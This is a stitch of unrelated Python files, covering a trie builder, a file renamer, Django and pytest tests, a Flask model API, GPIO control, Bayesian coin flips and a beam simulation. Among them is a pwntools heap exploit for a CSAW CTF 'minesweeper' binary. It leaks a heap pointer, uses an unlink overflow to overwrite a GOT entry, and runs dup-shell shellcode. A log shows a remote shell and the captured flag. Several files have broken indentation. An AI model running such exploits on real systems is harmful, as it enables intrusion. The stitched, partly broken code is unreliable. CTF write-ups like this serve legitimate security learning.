L = ['ATAGA', 'ATC', 'GAT']
#L = ['apple', 'apropos', 'banana', 'bandana', 'orange']
#If parsing from file:
f = open('rosalind_trie.txt', 'r')
contents = f.read()
L = contents.strip().split('\n')  # file input overrides the sample list above
#Return: The adjacency list corresponding to the trie T for these patterns, in the following format. If T has n nodes, first label the root with 1 and then label the remaining nodes with the integers 2 through n in any order you like. Each edge of the adjacency list of T will be encoded by a triple containing the integer representing the edge's parent node, followed by the integer representing the edge's child node, and finally the symbol labeling the edge.
class Node:
    """Trie node: a string label plus outgoing (letter, child) edges."""

    def __repr__(self):
        return "Node: " + self.label

    def __init__(self, label):
        self.label = str(label)
        self.edges = []  # list of (letter, child Node) pairs

    def add(self, letter, n):
        # Fix: the original appended to a nonexistent global `edges`, which
        # raised NameError when called -- the edge list lives on the instance.
        self.edges.append((letter, n))
def getRootNode(L):
    """Build a trie from the strings in L and return its root Node.

    Node labels are assigned in creation order starting at 1 (the root).
    Assumes no string in L is a prefix of another (per the problem statement).
    """
    # can't use nonlocal keyword in python 2.7 -- mutate a dict instead
    outer = {'label': 1}
    def removeFirstLetter(L, letter):
        # Suffixes of the strings starting with `letter`; empty remainders
        # are dropped. A list comprehension (not filter()) so the result is
        # a real list under both Python 2 and 3 -- the original returned a
        # lazy filter object on Python 3, breaking `if not L` and re-iteration.
        return [l[1:] for l in L if l[0] == letter and l[1:]]
    def nextNodeEdgePairs(L):
        # Create one child node per distinct first letter, then recurse on
        # the suffixes grouped under that letter.
        if not L:
            return []
        enpair = []
        for l in L:
            # if not already existing as an edge:
            if l[0] not in [letter for (letter, node) in enpair]:
                # create a new node and add it to the enpair list
                newnode = Node(outer['label'])
                outer['label'] += 1
                enpair.append((l[0], newnode))
                # for this new node, repeat the procedure with the list with
                # the first letter chopped off:
                newL = removeFirstLetter(L, l[0])
                newnode.edges += nextNodeEdgePairs(newL)
        return enpair
    root = Node(outer['label'])
    outer['label'] += 1
    root.edges += nextNodeEdgePairs(L)
    return root
def getAdjList(node):
    """Flatten the trie below `node` into (parent, child, letter) triples."""
    triples = []
    for letter, child in node.edges:
        triples.append((node.label, child.label, letter))
        triples.extend(getAdjList(child))
    return triples
root = getRootNode(L)
listings = getAdjList(root)
#for l in listings:
#print ' '.join([p for p in l])
#If writing to file:
# One "parent child letter" triple per line, as rosalind expects.
w = open('rosalind_trie_output.txt','w')
for l in listings:
    w.write(' '.join([p for p in l]) + '\n')
w.close()
|
#! python3
'''
To add a prefix to the start of the filename, such as adding spam_ to
rename eggs.txt to spam_eggs.txt
'''
import os, shutil
#TODO:ask user for prefix
filename_prefix = input('Enter the prefix that you want to add:\n')
#TODO:list all the files from the directory and rename them with prefix added
for filenames in os.listdir('.'):
    #ignore 'rename.py' code file
    if filenames == 'rename.py':
        continue
    #add prefix to filename
    newfilename = filename_prefix + filenames
    abs_path = os.path.abspath('.')
    filename_path = os.path.join(abs_path, filenames)
    newfilename_path = os.path.join(abs_path, newfilename)
    #rename all the files using shutil module
    # NOTE(review): this also renames directories and will re-prefix
    # already-renamed files on a second run -- confirm that's acceptable.
    shutil.move(filename_path, newfilename_path)
#ignore
input('Enter \'ENTER\' to quit()')
import unittest
import elektra
import pandas as pd
import datetime as dt
class ElektraTests(unittest.TestCase):
    """Smoke tests for the elektra price library (CSV fixtures under tests/)."""

    def test_hello_elektra(self):
        # simple test to verify tests are executing
        result = elektra.hello()
        self.assertEqual(result, 'elektra says hi')

    def test_create_price_method(self):
        # happy path test through the elektra create price method
        # create a panda from the test csv file
        prices = pd.read_csv('tests/created_prices.csv')
        # call the create prices method and compare results
        result = elektra.create_prices(dt.datetime.strptime('2020-10-17','%Y-%m-%d'),'M.P4F8', 'INDIANA.HUB', 'miso','2x16','Daily', prices)
        self.assertEqual(result,22.779374999999998)

    def test_scrub_price_method(self):
        # happy path test through the elektra scrub price method
        # create a panda from the test csv file
        prices = pd.read_csv('tests/scrub_hourly_prices.csv')
        # call the create prices method and compare results
        result = elektra.scrub_hourly_prices(dt.datetime.strptime('2020-10-17','%Y-%m-%d'),'M.YERX', '116013753', 'pjm', prices)
        # NOTE(review): assertTrue(x, msg) only checks that x is truthy -- the
        # CSV path here is the failure *message*, not a comparison, and the
        # bound method `result.to_csv` is always truthy. Probably meant to
        # compare against the expected file; confirm intent.
        self.assertTrue(result.to_csv,'test-data/scrub_hourly_prices_result.csv')
if __name__ == '__main__':
unittest.main() |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-03-28 09:29
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: adds the Kid model and refreshes two time-field defaults.

    dependencies = [
        ('coddy', '0006_auto_20180327_1710'),
    ]

    operations = [
        migrations.CreateModel(
            name='Kid',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=30)),
                ('surname', models.CharField(max_length=30)),
                ('image', models.ImageField(upload_to='media/img')),
                ('disc', models.CharField(max_length=300)),
            ],
            options={
                'verbose_name': 'Ребенок',
                'verbose_name_plural': 'Дети',
            },
        ),
        # NOTE(review): these defaults are fixed timestamps baked in at
        # makemigrations time -- the model likely used an eagerly-evaluated
        # datetime.now() instead of the callable. Harmless in the migration,
        # but worth fixing on the model.
        migrations.AlterField(
            model_name='donate',
            name='time',
            field=models.TimeField(blank=True, default=datetime.datetime(2018, 3, 28, 12, 29, 51, 271395)),
        ),
        migrations.AlterField(
            model_name='volunteer',
            name='time',
            field=models.TimeField(blank=True, default=datetime.datetime(2018, 3, 28, 12, 29, 51, 271853)),
        ),
    ]
|
# python 2.7.3
import sys
import math
n = input()
a = 2
# Appears to build an n-digit number out of digits 1 and 2 by prepending one
# digit per step, choosing the digit that keeps the number divisible by 2**i
# after step i (e.g. 2 -> 12, since 12 % 4 == 0). TODO confirm intent.
for i in range(2, n + 1):
    if a % (2 ** i) == 0:
        a += 2 * 10 ** (i - 1)
    else:
        a += 10 ** (i - 1)
print a
|
"""
多进程文件计数
"""
import os
import atexit
import multiprocessing
import json
import time
class Count(object):
    """Recursively count files with a given extension under a set of paths.

    Note: `count()` must be called before `_count()` -- it wires in the
    Manager-backed sche_dict/file_list used for cross-process reporting.
    """
    def __init__(self, n):
        self.n = n      # worker id, used as the key in the shared dict
        self.num = 0    # running total for this worker
        # atexit.register(self.dump_file)

    def _count(self, path, count_type='.mp3'):
        # Depth-first walk: record matching filenames, recurse into subdirs.
        path = os.path.abspath(path)
        path_list = os.listdir(path)
        num = 0
        # add_path = False
        for p in path_list:
            new_p = path + '/' + p
            if count_type in p:
                # add_path = True
                self.file_list.append(p)
                self.num += 1
                num += 1
                # print(' ' * 90, end='\r')
                # print(path, p, num, self.num, end='\r')
            elif os.path.isdir(new_p):
                self._count(new_p)
        # Publish progress so the parent process can sum per-worker counts.
        self.sche_dict[self.n] = self.num
        # if add_path:
        #     self.path_map[path] = num
        #     # print(self.path_map)

    def count(self, pl, sche_dict, file_list):
        # pl: list of directory paths; shared structures come from a Manager.
        self.sche_dict = sche_dict
        self.file_list = file_list
        self.sche_dict[self.n] = 0
        for i in pl:
            self._count(i)
def dump_file(shce_dict, file_list):
    """Write the total count and every recorded filename to count.count,
    rendering a console progress bar while writing."""
    s = '█'
    print('dump to file....')
    with open('count.count', 'w') as f:
        allnum = sum(shce_dict.values())
        f.write('num: %s\n\n' % allnum)
        print('transf dict...')
        file_list = list(file_list)  # copy out of the Manager list proxy
        length = len(file_list)
        c = 0
        print('write to file...')
        for i in file_list:
            c += 1
            if c % 1000 == 0:
                # Redraw the progress bar roughly every 1000 files.
                print('%s%%' % round(c / length * 100, 1), '\x1b[?25l|' + format(s * int(c / length * 41), '<40') + '|', '%s/%s' % (c, length), ' ' * 20, end='\r')
                time.sleep(0.2)
            f.write('%s \n' % i)
        else:
            # for/else: runs after the loop completes -- prints the final bar.
            print('100%', '\x1b[?25l|' + format(s * int(c / length * 41), '<40') + '|', '%s/%s' % (c, length), ' ' * 20)
    print('done')
def e(*args):
    # Pool error callback: dump whatever the failed task reported.
    print(args)
def s(*args):
    # Pool success callback: intentionally a no-op.
    pass
def mmain():
    """Fan out counting over 8 workers, each owning 128 numbered directories,
    then aggregate the shared results and dump them to disk."""
    pool = multiprocessing.Pool(8)
    m = multiprocessing.Manager()
    shce_dict = m.dict()
    file_list = m.list()
    process_list = []
    for i in range(8):
        # Worker i handles directories [i*128, (i+1)*128).
        j = i + 1
        k = i * 128
        j *= 128
        path_list = [str(x) for x in range(k, j)]
        c = Count(str(i))
        a = pool.apply_async(c.count, args=(path_list, shce_dict, file_list), error_callback=e, callback=s)
        process_list.append(a)
    pool.close()
    # Poll once per second until every async result is ready.
    while 1:
        l = [x.ready() for x in process_list]
        if all(l):
            break
        else:
            time.sleep(1)
            print(l)
    print(shce_dict)
    print('all num: %s' % sum(shce_dict.values()))
    dump_file(shce_dict, file_list)
# def main(path):
# c = Count('')
# c.count(path)
if __name__ == '__main__':
# main(['/repertory/capture/downloads/tencent/mp3'])
mmain()
|
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def activate(context, *paths):
    """
    For use in navigation. Returns "active" if the navigation page
    is the same as the page requested.
    The 'django.template.context_processors.request' context processor
    must be activated in your settings.
    In an exception, django doesnt use a RequestContext, so we can't
    necessarily always assume it being present.
    """
    if 'request' in context:
        # Conditional expression instead of the original fragile
        # `bool(...) and "active" or ""` idiom (same result, clearer intent).
        return "active" if context['request'].path in paths else ""
    return ''
|
#!/bin/python3
def game_of_thrones_i(s):
    """Return 'YES' when the characters of s can be rearranged into a palindrome.

    A palindrome permutation exists iff at most one letter occurs an odd
    number of times. Assumes lowercase ascii letters only.
    """
    counts = [0] * 26
    for ch in s:
        counts[ord(ch) - 97] += 1
    odd = sum(1 for c in counts if c % 2)
    return 'YES' if odd <= 1 else 'NO'
def main():
    # Read one line from stdin and print the palindrome-permutation verdict.
    print(game_of_thrones_i(input().strip()))
main()
import os
from process_handle_ps import ProcessHandlePs
from process_provider import ProcessProvider
class ProcessProvider_PS(ProcessProvider):
    """
    Process provider on top of the "ps" utility.
    """

    def _collect_all(self):
        # One line per process; columns as declared by ProcessHandlePs.ATTRS.
        return os.popen('ps ax -o %s' % (','.join(ProcessHandlePs.ATTRS))).readlines()

    def _collect_set(self, pidset):
        # Restrict ps to the given pid set.
        return os.popen('ps -p %s -o %s' % (
            ','.join(map(str, pidset)), ','.join(ProcessHandlePs.ATTRS))).readlines()

    def _translate_line_to_pid_pair(self, line):
        """Parse one ps output line into (pid, ppid).

        Returns (None, None) for lines that don't parse (e.g. the header).
        """
        sline = line.split()
        try:
            return (int(sline[ProcessHandlePs.ATTRS.index('pid')]),
                    int(sline[ProcessHandlePs.ATTRS.index('ppid')]))
        except (ValueError, IndexError):
            # Narrowed from a bare `except:` -- only parse failures
            # (non-numeric header text, short lines) are expected here;
            # anything else should propagate.
            return None, None

    def _translate_line_to_handle(self, line):
        return ProcessHandlePs.from_line(line)

    @staticmethod
    def _platform_compatible():
        # Compatible with any Unix flavor with SUSv2+ conformant 'ps'.
        return True
|
from flask import Flask, jsonify, request
from sklearn.externals import joblib
import pandas as pd
import os
app = Flask(__name__)
#route our app to domain/predictiris , accept POST requests
@app.route('/predictiris', methods=['POST'])
def irisapi():
    '''our main function that handles our requests and delivers classified data in json format'''
    #Receive our json data from our client, create a dataframe.
    try:
        postjson = request.json
        clientdata = pd.DataFrame(postjson)
    except Exception as e:
        raise e
    #Evaluate whether we have data, if we don't return bad_request
    # NOTE(review): bad_request() is not defined in this file -- confirm it is
    # provided elsewhere, otherwise this branch raises NameError.
    if clientdata.empty:
        return(bad_request())
    #load our iris clf model
    pklclf = 'irisclassifier.pkl'
    clf = joblib.load(f'./models/{pklclf}')
    #classify our clients data
    y_pred = clf.predict(clientdata)
    #Decode our encoded data labels, so the client receives labels not encoded values
    fnames = {0:'Setosa',1:'Versicolor',2:'Virginica'}
    #list comprehension, applying our mapping to get the labels and placing in our dataframe
    clientdata['PredictedIris'] = [fnames.get(x, x) for x in y_pred]
    #return json data to our client, give status code 200 - OK response contains a payload
    apiresponse = jsonify(predictions=clientdata.to_json(orient="records"))
    apiresponse.status_code = 200
    return (apiresponse)
if __name__ == "__main__":
app.run() |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import lylidatabase
# Interactive loop (Python 2): each stdin line is looked up in the database.
l = lylidatabase.LyliDatabase('links.txt', 'access.log')
while True:
    print l.request(raw_input())
|
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="keys.json"
from bq_helper import BigQueryHelper
import plotly.graph_objs as go
from plotly.offline import plot
# (same env var set again -- redundant but harmless)
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="keys.json"
bq_assistant = BigQueryHelper('bigquery-public-data', 'san_francisco')
QUERY = """
SELECT station_id, docks_available, bikes_available, time
FROM `bigquery-public-data.san_francisco.bikeshare_status`
LIMIT 10
"""
df = bq_assistant.query_to_pandas(QUERY)
# Focus on one station; sum bikes available per docks-available bucket.
id_bike_df = df[df['station_id']==90]
bike_id_groupby = id_bike_df.groupby(['docks_available'])['bikes_available'].sum()
trace1 = go.Scatter(
    x=bike_id_groupby.index,
    y=bike_id_groupby.values,
    mode = "lines",
    name = "request_status")
# Hard-coded example bar chart for three station ids.
trace3 = go.Bar(x=['87', '90', '91'],
    y=[1, 8, 2])
layout_1 = dict(
    title = 'bikeshare_status',
    xaxis= dict(title= 'station_id'),
    yaxis=dict(title='bikes_available'),
)
layout_2 = dict(
    title = 'status_of_request',
    xaxis= dict(title= 'station_id'),
    yaxis=dict(title='docks_available'),
)
fig_1 = dict(data = [trace1], layout = layout_1)
plot(fig_1)
fig_2 = dict(data = [trace3], layout = layout_2)
plot(fig_2)
#!/usr/bin/env python
import RPi.GPIO as GPIO
import time

GPIO.setmode(GPIO.BOARD)
# Every channel we drive must be configured as an output first -- the
# original only set up pin 21 and then wrote to 22/23/24, which makes
# RPi.GPIO raise "channel has not been set up".
GPIO.setup(21, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
GPIO.setup(23, GPIO.OUT)
GPIO.setup(24, GPIO.OUT)
# Drive three pins high, then drop pin 24 after two seconds.
GPIO.output(22, True)
GPIO.output(23, True)
GPIO.output(24, True)
time.sleep(2)
GPIO.output(24, False)
time.sleep(2)
|
import numpy as np
import random as random
import math
import re
import sys
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
def generate_flips(N, theta):
    """Simulate N Bernoulli(theta) coin flips; returns a 0/1 integer array."""
    draws = np.array([random.random() for _ in range(N)])
    # A draw below theta counts as heads (1).
    return (draws < theta) * 1
def make_data_flips(N, theta):
    """Simulate N Bernoulli(theta) flips and write them to 'data.out'
    as comma-separated 0/1 values."""
    samps = list(generate_flips(N, theta))
    output = ", ".join(str(e) for e in samps)
    # BUG FIX: use a context manager -- the original never closed the file,
    # so the data could stay unflushed.
    with open('data.out', 'w') as f:
        f.write(output)
def prior(theta, a, b):
    """Beta(a, b) prior density evaluated at theta."""
    beta_fn = (math.gamma(a) * math.gamma(b)) / math.gamma(a + b)
    coeff = 1 / beta_fn
    density = coeff * (theta ** (a - 1) * (1 - theta) ** (b - 1))
    return density
def likelihood(y, theta):
    """Bernoulli likelihood of the 0/1 flip sequence y given heads
    probability theta."""
    heads = sum(y)
    total = len(y)
    return (theta ** heads) * (1 - theta) ** (total - heads)
def kposterior(theta, y):
    """Unnormalised posterior: Bernoulli likelihood times a flat Beta(1,1)
    prior."""
    return likelihood(y, theta) * prior(theta, 1, 1)
def makekposterior(file):
    """Evaluate the unnormalised posterior on a 100-point theta grid for the
    comma-separated flip data in `file`, writing 'kpost.out' with the theta
    grid on line 1 and the posterior values on line 2."""
    y = np.loadtxt(file, comments="#", delimiter=",", unpack=False)
    theta = np.linspace(0, 1, 100)
    posterior = likelihood(y, theta) * prior(theta, 1, 1)
    theta_out = ", ".join(str(e) for e in theta)
    posterior_out = ", ".join(str(e) for e in posterior)
    # BUG FIX: context manager closes/flushes the output file; the original
    # leaked the handle.
    with open('kpost.out', 'w') as f_out:
        f_out.write(theta_out)
        f_out.write('\n')
        f_out.write(posterior_out)
def plotkposterior(file):
    """Plot posterior probability versus theta from a kpost.out-style file."""
    grid, post = np.loadtxt(file, delimiter=",", unpack=False)
    plt.figure()
    plt.plot(grid, post)
    plt.xlabel('Theta')
    plt.ylabel('Posterior probability')
    plt.title('Posterior probability for coin flip')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""测试基本类型"""
from typing import Any
import pytest
from smorest_sfs.extensions.marshal.bases import (
BaseIntListSchema,
BaseMsgSchema,
BasePageSchema,
)
class TestBasesMaClass:
    """Exercise the base marshalling schemas: message, int-list and page."""

    # Shared fixture data for the pagination test.
    _LINKS = {"next": "nurl", "prev": "purl", "first": "furl", "last": "lurl"}
    _META = {"page": 1, "per_page": 10, "total": 100, "links": _LINKS}

    def test_base_msg(self) -> None:
        dumped = BaseMsgSchema().dump({})
        # An empty payload dumps to the default success envelope.
        assert dumped["msg"] == "success" and dumped["code"] == 0

    @pytest.mark.parametrize(
        "data, result",
        [({"lst": []}, []), ({"lst": [1, 2, 3, 4]}, [1, 2, 3, 4])],
    )
    def test_base_int_list(self, data: Any, result: Any) -> None:
        loaded = BaseIntListSchema().load(data)
        assert loaded["lst"] == result

    @pytest.mark.parametrize(
        "data, result",
        [({"meta": _META}, {"code": 0, "meta": _META, "msg": "success"})],
    )
    def test_base_page(self, data: Any, result: Any) -> None:
        # Dumping pagination meta must add the success envelope untouched.
        assert BasePageSchema().dump(data) == result
|
#!/usr/bin/env python


def test():
    """Print a fixed smoke-test message."""
    # Call form works on both Python 2 and Python 3 (the original used the
    # Python-2-only `print` statement).
    print('This is a test.')
    return


test()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# CSAW "minesweeper" heap exploit: leak a heap address by viewing a board,
# then overflow a second board into the next chunk to trigger the classic
# unsafe-unlink primitive, pointing fwrite's GOT entry at shellcode stored
# on the heap.
from pwn import *
context(arch='i386', os='linux', terminal=['tmux', 'neww'])
if args['REMOTE']:
    io = remote('pwn.chal.csaw.io', 7478)
    elf, libc = ELF('./minesweeper'), None
else:
    io = remote('localhost', 31337)
    elf, libc = ELF('./minesweeper'), None
# initialize a board and then view it to leak an heap address
io.recvuntil('3) Q (Quit)\n')
io.sendline('I')
x = 4
y = 4
io.recvuntil(
    'Please enter in the dimensions of the board you would like to set in this format: B X Y\n')
io.sendline('B {} {}'.format(x, y))
io.sendline('X' * (y * x))
io.recvuntil('3) Q (Quit)\n')
io.sendline('N')
io.recvuntil('3) Quit game (Q)\n')
io.sendline('V')
# print hexdump(io.recvall(timeout=1))
# Skip the 0x14 bytes of board header that precede the leaked pointer.
io.recvn(0x14)
an_heap_address = u32(io.recvn(0x4)) # 0x804c0f0
success('an_heap_address: %s' % hex(an_heap_address))
io.sendline('Q')
# initialize a board and overflow in the next heap chunk to trigger the classic unlink vulnerability
io.recvuntil('3) Q (Quit)\n')
io.sendline('I')
io.recvuntil(
    'Please enter in the dimensions of the board you would like to set in this format: B X Y\n')
x = 20
y = 20
io.sendline('B {} {}'.format(x, y))
got_fwrite_address = 0x804bd64
# Shellcode sits 0xc bytes past the leaked chunk base (0x804c0fc - 0x804c0f0).
shellcode_address = an_heap_address + (0x804c0fc - 0x804c0f0)
success('shellcode_address: %s' % hex(shellcode_address))
io.sendline(
    fit({
        0: asm(
            'jmp $+0x6'
        ), # the shellcode starts here, but we need to skip the next bytes which are overwritten by unlink
        4: 0xffffffff,
        8: asm('push 0x4; pop ebp') +
        asm(shellcraft.i386.linux.dupsh()), # the shellcode continues here
        cyclic_find('taad'): p32(got_fwrite_address - 0x8),
        cyclic_find('uaad'): p32(shellcode_address),
        (y * x - 1): 'X'
    }))
io.interactive()
# $ ./minesweeper.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 7478: Done
# [*] '/home/ubuntu/vbox/minesweeper'
# Arch: i386-32-little
# RELRO: No RELRO
# Stack: No canary found
# NX: NX disabled
# PIE: No PIE (0xc01000)
# RWX: Has RWX segments
# Packer: Packed with UPX
# [+] an_heap_address: 0x93740f0
# [+] shellcode_address: 0x93740fc
# . . .
# Please send the string used to initialize the board. Please send X * Y bytes follow by a newlineHave atleast 1 mine placed in your board, marked by the character X
# $ ls
# Makefile
# flag
# fork_accept.c
# malloc.c
# malloc.h
# minesweeper
# ms.c
# run.sh
# $ cat flag
# flag{h3aps4r3fun351eabf3}
|
'''
Testing Flexible Beam
'''
import sys
from scipy.integrate import odeint
from scipy.misc import derivative
from scipy import integrate
from scipy.optimize import root
from numpy.linalg import inv
import os
import pdb
from matplotlib import pyplot as plt
import numpy as np
from scipy import optimize
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
import InputShaping as shaping
import Generate_Plots as genplt
# ODE Solver characteristics (odeint absolute/relative tolerances, max step)
abserr = 1.0e-6
relerr = 1.0e-6
max_step = 0.01
# Per-script output directory for figures, named after the invoking script.
folder = 'Figures/{}/'.format(
    sys.argv[0],
)
if not os.path.exists(folder):
    os.makedirs(folder)
def response(p, Shaper,K,Disturbance=None):
    '''
    Generate the response of the flexible beam to a (possibly shaped) command.

    p           : (tau_max, rho, I, E, L, StartTime, t_step, t, X0, Distance, m_p)
    Shaper      : an ndarray shaper sequence, the string 'ZV', or anything
                  else for an unshaped unit command
    K           : feedback gain matrix forwarded to eq_motion
    Disturbance : optional disturbance forwarded to eq_motion

    Returns (in_shape, response) where response is the odeint state history.
    '''
    # Unpack the constraints and initial conditions
    tau_max, rho, I, E, L, StartTime, t_step, t, X0, Distance, m_p = p
    #Determine the step at which the command is initiated
    # NOTE(review): Start_step, input_vec and theta1_d are computed but never
    # used in this function.
    Start_step = np.round((StartTime / t_step)).astype(int)
    # Initialize
    input_vec = np.zeros([len(t),2])
    theta1_d = Distance
    response = np.zeros([len(t),len(X0)])
    if isinstance(Shaper,np.ndarray):
        # Caller supplied an explicit shaper sequence.
        in_shape = Shaper
    elif Shaper == 'ZV':
        # NOTE(review): omega_11/omega_12/omega_21/omega_22 are not defined in
        # this file; they must be globals supplied elsewhere -- confirm.
        in_shape1 = shaping.ZV_2mode(omega_11 / (2 * np.pi),0.0,omega_21/ (2 * np.pi),0.0).shaper
        in_shape2 = shaping.ZV_2mode(omega_12 / (2 * np.pi),0.0,omega_22 / (2 * np.pi),0.0).shaper
        in_shape = shaping.seqconv(in_shape1,in_shape2)
        #print('Two Mode Shaper: {}'.format(in_shape))
        K = K.T
    else:
        # Unshaped: a single unit impulse at time zero.
        in_shape = np.array([[0.,1]])
    p = [rho, in_shape, Distance, I, E, L, m_p]
    # Generate the response
    response = odeint(
        eq_motion, X0, t, args=(t,p,K,tau_max,Disturbance),
        atol=abserr, rtol=relerr, hmax=max_step,full_output=False
    )
    return in_shape,response
def eq_motion(X,t,t_sys,p,K_gains,max_effort,Disturbance):
    '''
    Return the state-space time derivatives for the flexible-beam manipulator.

    X           : state [theta1, delta1, phi1, delta2, phi2] plus the rates
    t           : current integration time
    t_sys       : full solver time vector (kept for the odeint call signature)
    p           : (rho, Shaper, Distance, I, E, l, m_p)
    K_gains     : state-feedback gain matrix
    max_effort  : actuator saturation limit
    Disturbance : unused placeholder (Dist is zeroed below)

    BUG FIX: removed a leftover pdb.set_trace() before the return -- it
    dropped into the debugger on every derivative evaluation, freezing odeint.
    Also removed the unused locals `variables` and `X_dot`.
    '''
    # Unpack all of the variables
    rho, Shaper, Distance, I, E, l, m_p = p
    # The X vector is of the form X, X_dot.
    theta1,delta1,phi1,delta2,phi2,\
    theta1_dot, delta1_dot, phi1_dot, delta2_dot, phi2_dot = X
    # Generate the reference angular trajectories based on the desired reference input and the input shaper
    shaped_pos1 = shaping.shaped_input(shaping.step_input,t,Shaper,Distance[0])
    shaped_vel1 = 0.
    Dist = np.zeros(len(X))
    # Put the equations of motion in the form:
    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    #
    #   | Q_dot  |   |      0       |   I   |   | Q     |
    #   |--------| = |----------------------| * |-------| + B * u
    #   | Q_ddot |   |  M^(-1) * K  |   0   |   | Q_dot |
    #
    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    M = np.array([
        [
            l**3*rho/105,
            13*l**2*rho/420,
            -l**3*rho/140,
            0,
            0
        ],
        [
            13*l**2*rho/420,
            26*l*rho/35,
            0,
            9*l*rho/70,
            -13*l**2*rho/420
        ],
        [
            -l**3*rho/140,
            0,
            2*l**3*rho/105,
            13*l**2*rho/420,
            -l**3*rho/140
        ],
        [
            0,
            9*l*rho/70,
            13*l**2*rho/420,
            13*l*rho/35 + m_p,
            -11*l**2*rho/210
        ],
        [
            0,
            -13*l**2*rho/420,
            -l**3*rho/140,
            -11*l**2*rho/210,
            l**3*rho/105
        ]
    ])
    K = np.array([
        [0, 0, 0, 0, 0],
        [0, 15*E*I/l**3, 9*E*I/l**2, -12*E*I/l**3, 6*E*I/l**2],
        [0, 3*E*I/l**2, 7*E*I/l, -6*E*I/l**2, 2*E*I/l],
        [0, -12*E*I/l**3, -6*E*I/l**2, 12*E*I/l**3, -6*E*I/l**2],
        [0, 6*E*I/l**2, 2*E*I/l, -6*E*I/l**2, 4*E*I/l]
    ])
    # Form the A matrix of the state-space equation
    # NOTE(review): the diagram above calls for M^(-1) * K, but the code
    # multiplies M * K without inverting M -- confirm whether inv(M) was
    # intended.
    A_lower = np.concatenate((np.matmul(M,K),np.zeros_like(M)),axis=1)
    A_upper = np.concatenate((np.zeros_like(M),np.eye(len(M[:,0]))),axis=1)
    A = np.concatenate((A_upper,A_lower),axis=0)
    # B is the input matrix, where the state variables are arranged by Q_ddot, Q_dot
    # The first two variables are for the input torques tau1, tau2
    # Each other input value should be zero
    B = np.array([1,0,0,0,0]).T
    # Reference desired states based on the shaped position and velocity.
    X_ref = np.array([shaped_pos1,0,0,0,0,shaped_vel1,0,0,0,0]).T
    # The control effort is given by multiplying the gain matrix by the desired reference states
    u = np.matmul(K_gains.T,(X_ref - X))
    # If we are not optimizing, clip the actuator effort based on the maximum allowable.
    # Otherwise, we want to see the "real" actuator effort without being clipped.
    # NOTE(review): `optimize` is the scipy.optimize module imported at the top
    # of the file, so `optimize == False` is always False and this clipping
    # never executes -- a dedicated boolean flag was probably intended.
    if optimize == False:
        u = np.clip(u,-max_effort,max_effort)
    ODE = [np.matmul(A[0,:],X) + Dist[0],
        np.matmul(A[1,:],X) + Dist[1],
        np.matmul(A[2,:],X) + Dist[2],
        np.matmul(A[3,:],X) + Dist[3],
        np.matmul(A[4,:],X) + Dist[4],
        np.matmul(A[5,:],X) + u[0] + Dist[5],
        np.matmul(A[6,:],X) + Dist[6],
        np.matmul(A[7,:],X) + Dist[7],
        np.matmul(A[8,:],X) + Dist[8],
        np.matmul(A[9,:],X) + Dist[9],
        ]
    return ODE
|
def wordFreq():
    """Count mentions of 'coffee', 'Gluten-free' and 'woke' in
    hipster_ipsum.txt, returning three human-readable summary strings."""
    glutenFreeMentions = 0
    coffeeMentions = 0
    wokeMentions = 0
    freqs = []
    # BUG FIX: open the file per call inside a with-block. The original opened
    # it once at module level and never closed it, so a second call read from
    # an exhausted stream and returned zero counts.
    with open('hipster_ipsum.txt') as file:
        for word in file.read().split():
            if word == 'coffee':
                coffeeMentions += 1
            if word == 'Gluten-free':
                glutenFreeMentions += 1
            if word == 'woke':
                wokeMentions += 1
    freqs.append('coffee mentions= ' + str(coffeeMentions))
    freqs.append('gluten-free mentions = ' + str(glutenFreeMentions))
    freqs.append('woke mentions = ' + str(wokeMentions))
    return freqs


if __name__ == "__main__":
    # Guarded so importing this module does not require the data file.
    print(wordFreq())
|
# python 2.7.3 originally; ported to also run on Python 3.
import sys
import math


def f(s):
    """Return the decimal digit sum of integer (or numeric string) s."""
    return sum(int(c) for c in str(s))


# ans[i] = number of i-digit strings whose two halves have equal digit sums.
# Even i: count pairs of (i/2)-digit halves with matching digit sums.
# Odd i: the recurrence multiplies the previous count by 10 (free middle
# digit); note ans[1] stays 0 because ans[0] is 0 -- preserved as-is.
ans = [0] * 10
for i in range(1, 10):
    if i % 2 == 0:
        m = {}
        for j in range(100):
            m[j] = 0
        # `//` replaces Python 2's integer `/`.
        for j in range(10 ** (i // 2)):
            m[f(j)] += 1
        cnt = 0
        # .values() replaces Python-2-only .iteritems().
        for v in m.values():
            cnt += v ** 2
        ans[i] = cnt
    else:
        ans[i] = 10 * ans[i - 1]


if __name__ == "__main__":
    # int(input()) matches Python 2's evaluating input() for integer input.
    k = int(input())
    print(ans[k])
|
import shutil
from tqdm import tqdm_notebook as tqdm
import gzip
from youconfigme import AutoConfig
import pandas as pd
from pathlib import Path
import os
import requests
# taken from youconfigme's cast_utils
def ensure_path(path):
    """Return `path` as a Path, creating the directory (and parents) first
    if it does not already exist."""
    as_path = Path(path)
    as_path.mkdir(parents=True, exist_ok=True)
    return as_path
def download_file(url, dest, override=False, chunksize=4096):
    """Stream `url` to the local file `dest` with a tqdm progress bar.

    Skips the download when `dest` already exists unless `override` is True.
    `chunksize` is the number of bytes fetched per iteration.
    """
    if os.path.exists(dest) and not override:
        return
    with requests.get(url, stream=True) as r:
        try:
            file_size = int(r.headers["Content-Length"])
        except KeyError:
            # Server did not report a length; tqdm then shows raw counts.
            file_size = 0
        # (Removed the unused `chunks = file_size // chunksize` computation.)
        with open(dest, "wb") as f, tqdm(
            total=file_size, unit="iB", unit_scale=True
        ) as t:
            for chunkdata in r.iter_content(chunksize):
                f.write(chunkdata)
